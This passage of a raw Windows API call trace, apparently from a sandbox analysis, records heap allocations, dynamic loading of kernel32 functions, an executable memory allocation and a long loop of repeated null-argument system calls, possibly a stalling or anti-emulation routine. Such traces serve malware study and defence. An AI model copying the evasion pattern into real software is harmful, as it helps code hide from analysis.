(HeapHandle=0x3010000, Flags=0x8, Size=0x12) returned 0x3011dd0 [0242.746] RtlAllocateHeap (HeapHandle=0x3010000, Flags=0x8, Size=0x21) returned 0x3011df0 [0242.747] RtlAllocateHeap (HeapHandle=0x3010000, Flags=0x8, Size=0x16) returned 0x3011e20 [0242.747] RtlAllocateHeap (HeapHandle=0x3010000, Flags=0x8, Size=0x22) returned 0x3011e40 [0242.747] RtlAllocateHeap (HeapHandle=0x3010000, Flags=0x8, Size=0x12) returned 0x3011e70 [0242.747] HeapFree (in: hHeap=0x3010000, dwFlags=0x0, lpMem=0x3010fd0 | out: hHeap=0x3010000) returned 1 [0242.747] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0242.748] RtlAllocateHeap (HeapHandle=0x3010000, Flags=0x8, Size=0x800) returned 0x3011e90 [0242.748] RtlAllocateHeap (HeapHandle=0x3010000, Flags=0x8, Size=0x80) returned 0x3010fd0 [0242.748] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4052ea) returned 0x0 [0242.748] RtlSizeHeap (HeapHandle=0x3010000, Flags=0x0, MemoryPointer=0x3010fd0) returned 0x80 [0242.749] GetLastError () returned 0x0 [0242.749] SetLastError (dwErrCode=0x0) [0242.749] GetLastError () returned 0x0 [0242.749] SetLastError (dwErrCode=0x0) [0242.749] GetLastError () returned 0x0 [0242.749] SetLastError (dwErrCode=0x0) [0242.749] GetLastError () returned 0x0 [0242.749] SetLastError (dwErrCode=0x0) [0242.749] GetLastError () returned 0x0 [0242.749] SetLastError (dwErrCode=0x0) [0242.749] GetLastError () returned 0x0 [0242.749] SetLastError (dwErrCode=0x0) [0242.749] GetLastError () returned 0x0 [0242.749] SetLastError (dwErrCode=0x0) [0242.750] GetLastError () returned 0x0 [0242.750] SetLastError (dwErrCode=0x0) [0242.750] GetLastError () returned 0x0 [0242.750] SetLastError (dwErrCode=0x0) [0242.750] GetLastError () returned 0x0 [0242.750] SetLastError (dwErrCode=0x0) [0242.750] GetLastError () returned 0x0 [0242.750] SetLastError (dwErrCode=0x0) [0242.750] GetLastError () returned 0x0 [0242.750] SetLastError (dwErrCode=0x0) [0242.750] GetLastError () returned 0x0 [0242.750] SetLastError (dwErrCode=0x0) [0242.750] GetLastError () returned 0x0 [0242.750] SetLastError (dwErrCode=0x0) [0242.750] GetLastError () returned 0x0 [0242.750] SetLastError (dwErrCode=0x0) [0242.750] GetLastError () returned 0x0 [0242.751] SetLastError (dwErrCode=0x0) [0242.751] GetLastError () returned 0x0 [0242.751] SetLastError (dwErrCode=0x0) [0242.751] GetLastError () returned 0x0 [0242.751] SetLastError (dwErrCode=0x0) [0242.751] GetLastError () returned 0x0 [0242.751] SetLastError (dwErrCode=0x0) [0242.751] GetLastError () returned 0x0 [0242.751] SetLastError (dwErrCode=0x0) [0242.751] GetLastError () returned 0x0 [0242.751] SetLastError (dwErrCode=0x0) [0242.751] GetLastError () returned 0x0 [0242.751] SetLastError (dwErrCode=0x0) [0242.751] GetLastError () returned 0x0 [0242.751] SetLastError (dwErrCode=0x0) [0242.752] GetLastError () returned 0x0 [0242.752] SetLastError (dwErrCode=0x0) [0242.752] GetLastError () returned 0x0 [0242.752] SetLastError (dwErrCode=0x0) [0242.752] GetLastError () returned 0x0 [0242.752] SetLastError (dwErrCode=0x0) [0242.752] GetLastError () returned 0x0 [0242.752] SetLastError (dwErrCode=0x0) [0242.752] GetLastError () returned 0x0 [0242.752] SetLastError (dwErrCode=0x0) [0242.752] GetLastError () returned 0x0 [0242.752] SetLastError (dwErrCode=0x0) [0242.752] GetLastError () returned 0x0 [0242.752] SetLastError (dwErrCode=0x0) [0242.752] GetLastError () returned 0x0 [0242.753] SetLastError (dwErrCode=0x0) [0242.753] GetLastError () returned 0x0 [0242.753] SetLastError (dwErrCode=0x0) [0242.753] GetLastError () returned 0x0 [0242.753] SetLastError (dwErrCode=0x0) [0242.753] GetLastError () returned 0x0 [0242.753] SetLastError (dwErrCode=0x0) [0242.753] GetLastError () returned 0x0 [0242.753] SetLastError (dwErrCode=0x0) [0242.753] GetLastError () returned 0x0 [0242.753] SetLastError (dwErrCode=0x0) [0242.753] GetLastError () returned 0x0 [0242.753] SetLastError (dwErrCode=0x0) [0242.753] GetLastError () returned 0x0 [0242.753] SetLastError (dwErrCode=0x0) [0242.753] GetLastError () returned 0x0 [0242.754] SetLastError (dwErrCode=0x0) [0242.754] GetLastError () returned 0x0 [0242.754] SetLastError (dwErrCode=0x0) [0242.754] GetLastError () returned 0x0 [0242.754] SetLastError (dwErrCode=0x0) [0242.754] GetLastError () returned 0x0 [0242.754] SetLastError (dwErrCode=0x0) [0242.754] GetLastError () returned 0x0 [0242.754] SetLastError (dwErrCode=0x0) [0242.754] GetLastError () returned 0x0 [0242.754] SetLastError (dwErrCode=0x0) [0242.754] GetLastError () returned 0x0 [0242.754] SetLastError (dwErrCode=0x0) [0242.755] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x74650000 [0242.757] GetProcAddress (hModule=0x74650000, lpProcName="LocalAlloc") returned 0x74667a30 [0242.757] LocalAlloc (uFlags=0x0, uBytes=0x7f80) returned 0x2f11c28 [0242.757] VirtualAlloc (lpAddress=0x0, dwSize=0x7f80, flAllocationType=0x1000, flProtect=0x40) returned 0x3020000 [0242.758] GetTickCount () returned 0x2027f9b [0242.758] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0242.758] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0242.758] GetTickCount () returned 0x2027f9b [0242.758] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0242.759] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0242.759] GetTickCount () returned 0x2027f9b [0242.759] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0242.759] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0242.759] GetTickCount () returned 0x2027f9b [0242.759] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0242.759] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0242.759] GetTickCount () returned 0x2027f9b [0242.759] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0242.759] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0242.759] GetTickCount () returned 0x2027f9b [0242.759] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0242.759] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0242.759] GetTickCount () returned 0x2027f9b [0242.759] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0242.759] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0242.759] GetTickCount () returned 0x2027f9b [0242.759] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0242.760] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0242.760] GetTickCount () returned 0x2027f9b [0242.760] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0242.760] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0242.760] GetTickCount () returned 0x2027f9b [0242.760] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0242.760] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0242.760] GetTickCount () returned 0x2027f9b [0242.760] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0242.760] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0242.760] GetTickCount () returned 0x2027f9b [0242.760] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0242.760] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0242.760] GetTickCount () returned 0x2027f9b [0242.760] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0242.760] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0242.760] GetTickCount () returned 0x2027f9b [0242.760] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0242.761] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0242.761] GetTickCount () returned 0x2027f9b [0242.761] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0242.761] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0242.761] GetTickCount () returned 0x2027f9b [0242.761] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0242.761] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0242.761] GetTickCount () returned 0x2027f9b [0242.761] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0242.761] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0242.761] GetTickCount () returned 0x2027f9b [0242.761] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0242.761] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0242.761] GetTickCount () returned 0x2027f9b [0242.761] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0242.761] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0242.761] GetTickCount () returned 0x2027f9b [0242.761] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0242.762] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0242.762] GetTickCount () returned 0x2027f9b [0242.762] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0242.762] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0242.762] GetTickCount () returned 0x2027f9b [0242.762] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0242.762] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0242.762] GetTickCount () returned 0x2027f9b [0242.762] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0242.762] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0242.762] GetTickCount () returned 0x2027f9b [0242.762] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0242.762] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0242.762] GetTickCount () returned 0x2027f9b [0242.762] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0242.762] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0242.762] GetTickCount () returned 0x2027f9b [0242.762] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0242.762] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0242.763] GetTickCount () returned 0x2027f9b [0242.763] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0242.763] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0242.763] GetTickCount () returned 0x2027f9b [0242.763] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0242.763] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0242.763] GetTickCount () returned 0x2027f9b [0242.763] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0242.763] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0242.763] GetTickCount () returned 0x2027f9b [0242.763] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0242.763] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0242.763] GetTickCount () returned 0x2027f9b [0242.763] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0242.763] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0242.763] GetTickCount () returned 0x2027f9b [0242.763] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0242.763] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0242.764] GetTickCount () returned 0x2027f9b [0242.764] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0242.764] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0242.764] GetTickCount () returned 0x2027f9b [0242.764] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0242.764] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0242.764] GetTickCount () returned 0x2027f9b [0242.764] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0242.764] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0242.764] GetTickCount () returned 0x2027f9b [0242.764] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0242.764] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0242.764] GetTickCount () returned 0x2027f9b [0242.764] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0242.764] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0242.764] GetTickCount () returned 0x2027f9b [0242.764] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0242.764] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0242.764] GetTickCount () returned 0x2027f9b [0242.764] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0242.765] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0242.765] GetTickCount () returned 0x2027f9b [0242.765] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0242.765] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0242.765] GetTickCount () returned 0x2027f9b [0242.765] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0242.765] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0242.765] GetTickCount () returned 0x2027f9b [0242.765] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0242.765] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0242.765] GetTickCount () returned 0x2027f9b [0242.765] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0242.765] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0242.765] GetTickCount () returned 0x2027f9b [0242.765] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0242.765] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0242.765] GetTickCount () returned 0x2027f9b [0242.765] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0242.765] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0242.765] GetTickCount () returned 0x2027f9b [0242.765] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0242.765] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0242.765] GetTickCount () returned 0x2027f9b [0242.766] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0242.766] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0242.766] GetTickCount () returned 0x2027f9b [0242.766] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0242.766] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0242.766] GetTickCount () returned 0x2027f9b [0242.766] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0242.766] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0242.766] GetTickCount () returned 0x2027f9b [0242.766] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0242.766] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0242.766] GetTickCount () returned 0x2027f9b [0242.766] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0242.766] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0242.766] GetTickCount () returned 0x2027f9b [0242.766] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0242.766] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0242.766] GetTickCount () returned 0x2027f9b [0242.767] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0242.767] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0242.767] GetTickCount () returned 0x2027f9b [0242.767] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0242.767] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0242.767] GetTickCount () returned 0x2027f9b [0242.767] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0242.767] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0242.767] GetTickCount () returned 0x2027f9b [0242.767] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0242.767] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0242.767] GetTickCount () returned 0x2027f9b [0242.767] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0242.767] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0242.767] GetTickCount () returned 0x2027f9b [0242.767] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0242.767] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0242.767] GetTickCount () returned 0x2027f9b [0242.767] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0242.767] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0242.768] GetTickCount () returned 0x2027f9b [0242.768] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0242.768] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0242.768] GetTickCount () returned 0x2027f9b [0242.768] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0242.768] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0242.768] GetTickCount () returned 0x2027f9b [0242.768] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0242.768] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0242.768] GetTickCount () returned 0x2027f9b [0242.768] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0242.768] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0242.768] GetTickCount () returned 0x2027f9b [0242.768] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0242.768] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0242.769] GetTickCount () returned 0x2027f9b [0242.769] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0242.769] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0242.769] GetTickCount () returned 0x2027f9b [0242.769] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0242.769] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0242.769] GetTickCount () returned 0x2027f9b [0242.769] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0242.769] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0242.769] GetTickCount () returned 0x2027f9b [0242.769] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0242.769] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, 